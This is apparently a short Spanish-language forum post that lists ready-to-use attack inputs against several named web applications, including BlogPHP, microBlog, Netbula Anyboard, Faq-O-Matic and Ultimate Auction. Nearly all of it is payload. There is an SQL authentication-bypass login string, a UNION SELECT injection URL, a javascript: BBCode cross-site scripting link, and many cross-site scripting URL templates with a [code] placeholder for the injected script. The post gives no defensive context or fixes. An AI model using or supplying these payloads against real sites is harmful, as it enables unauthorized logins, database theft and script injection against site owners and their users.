Vulnerabilidades...

BlogPHP Authentication Bypass

Link:
http://host/index.php? act=login

username: a' or 1/*
password: cualquiera

----------------------------------------------------------

microBlog BBCode XSS

BBcode Ejemplo:

[url=javascript:alert(123)]title[/url]

-----------------------------------------------------------

microBlog SQL Injection

SQL Injection Ejemplo:

http://host/microblog/index.php? month=1&year=9999% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14/*

------------------------------------------------------------

Netbula Anyboard "tK" XSS Vuln

http://[host]/cgi-bin/anyboard.cgi?pvp=main/&cmd=find&tK=[code]&hIz

------------------------------------------------------------

Faq-O-Matic XSS Vuln


http://[victim]/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration=[code]
http://[victim]/fom.cgi?file=[code]&showLastModified=show
http://[victim]/fom.cgi?_insert=answer&cmd=[code]&file=1

-------------------------------------------------------------

GTP iCommerce XSS Vuln

http://[host]/index.php?page=listStory&cat=Programs+and+Services&subcat=[code]
http://[host]/index.php?page=listStory&cat=[code]

-------------------------------------------------------------

RedKernel Referrer Tracker "rkrt_stats.php" XSS

http://[host]/rkrt_stats.php?refs,,Last_7,0,">[code]

-------------------------------------------------------------

Ultimate Auction XSS Vuln

http://[victim]/cgi-local/auktion/item.pl/item.pl?item=[code]
http://[victim]/cgi-local/auktion/itemlist.pl?category=[code]

Salu2